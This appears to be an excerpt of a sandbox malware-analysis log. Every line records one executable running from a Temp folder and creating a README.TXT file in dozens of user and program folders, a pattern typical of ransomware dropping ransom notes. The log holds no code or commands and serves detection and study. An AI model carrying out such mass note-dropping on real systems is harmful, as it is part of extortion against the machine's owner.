                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\BPMLNOBVSB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\FENIVHOIKN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\NWTVCDUMOB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\UMMBDNEQBN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\VLZDGUKUTZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Documents\WUTJSCBCFX\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\BPMLNOBVSB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Pictures\Camera Roll\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Pictures\Saved Pictures\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\PUB60COR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Favorites\Links\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Colors\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Effects\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\FENIVHOIKN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Simple\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\NWTVCDUMOB\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\UMMBDNEQBN\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\VLZDGUKUTZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Users\user\Desktop\WUTJSCBCFX\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\Addons\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1036\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\3082\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AccessWeb\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ACCWIZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AI\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AugLoop\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\BORDERS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Configuration\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FloodgateExperiences\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f14\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f2\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f33\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f4\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f7\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000006\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000008\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000009\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000011\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000050\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000055\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000064\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_w1\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LogoImages\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Media\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\Presentation Designs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Common AppData\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\System\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\SystemX86\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OneNote\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\osfFPA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookAutoDiscover\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PAGESIZE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PersonaSpy\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PROOF\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBBA\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBWIZ\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\QUERIES\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SAMPLES\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SkypeSrv\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\STARTUP\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\TextInputIntelligence\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\XLSTART\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\javafx\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\jdk\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\AAD0B0DB-711A-45EF-A013-BDD28531EC08\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\applet\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\cmm\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\deploy\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\ext\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\fonts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\i386\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jfr\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\management\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\client\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dtplugin\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\plugin2\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\Bundle\Assets\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\images\darkTheme\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\images\lightTheme\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\LogoImages\RNResources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\qml\QtQml\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\qml\QtQuick\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\qml\QtQuick.2\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\sourcemaps\react\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\SaslPrep\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Javascripts\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\Images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\Backgrounds\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\Bibliography\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\DataServices\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBFTSCM\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\PUBSPAPR\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\QuickStyles\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Sort\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\Style\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power Map Excel Add-in\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\Power View Excel Add-in\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-in\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\PowerPivot Excel Add-inv16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\en\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\1033\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\Analysis\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\SOLVER\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\images\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\Access\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\GettingStarted16\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\ONENOTE\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\private\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\DESIGNER\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\ODBC\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\System\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\Microsoft Office\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft Office\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\Microsoft SQL Server\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ar\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\bg\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\ca\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\cs\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\da\README.TXT
                          Source: C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\de\README.TXT
